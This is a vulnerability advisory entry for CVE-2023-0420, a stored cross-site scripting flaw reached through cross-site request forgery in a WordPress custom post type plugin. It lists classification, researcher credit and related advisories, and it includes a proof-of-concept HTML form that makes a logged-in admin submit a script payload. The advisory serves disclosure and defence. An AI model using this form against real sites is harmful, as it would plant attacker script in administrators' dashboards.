WordPress Plugin Vulnerabilities

Custom Post Type and Taxonomy GUI Manager <= 1.1 - Stored XSS via CSRF

Description

The plugin does not have CSRF, and is lacking sanitising as well as escaping in some parameters, allowing attackers to make a logged in admin put Stored Cross-Site Scripting payloads via CSRF

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body>
    <form action="https://example.com/wordpress/wp-admin/admin.php?page=cptctm-create-cpt" method="POST">
      <input type="hidden" name="rt_cpt_name" value="<script>alert(2)</script>" />
      <input type="hidden" name="rt_cpt_slug" value="alert2" />
      <input type="hidden" name="rt_menu_icon" value="" />
      <input type="hidden" name="select_taxonomy[3]" value="wp_template_part_area" />
      <input type="hidden" name="rt_submit" value="Create custom post type" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


The XSS will be trigged in the dashboard for Contributors and above.

Affects Plugins

Plugin icon
custom-post-type-cpt-cusom-taxonomy-ct-manager
No known fix

References

CVE
CVE-2023-0420

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Shreya Pohekar
Submitter
Shreya Pohekar
Submitter website
https://shreyapohekar.com
Submitter twitter
shreyapohekar
Verified
Yes
WPVDB ID
266e417f-ece7-4ff5-a724-4d9c8e2f3faa

Timeline

Publicly Published
2023-03-28 (about 1 years ago)
Added
2023-03-28 (about 1 years ago)
Last Updated
2023-03-28 (about 1 years ago)

Other

Published
Title
Published
2023-11-21
Title
Maspik – Spam blacklist < 0.9.3 - Unauthenticated Stored Cross-Site Scripting via efas_add_to_log
Published
2023-08-10
Title
Business Pro <= 1.10.4 - Reflected XSS
Published
2021-08-26
Title
Multiple Plugins from CRM Perks - Reflected Cross-Site Scripting
Published
2014-08-01
Title
Flashlight - Unspecified XSS
Published
2021-06-21
Title
myStickymenu < 2.5.2 - Authenticated Stored XSS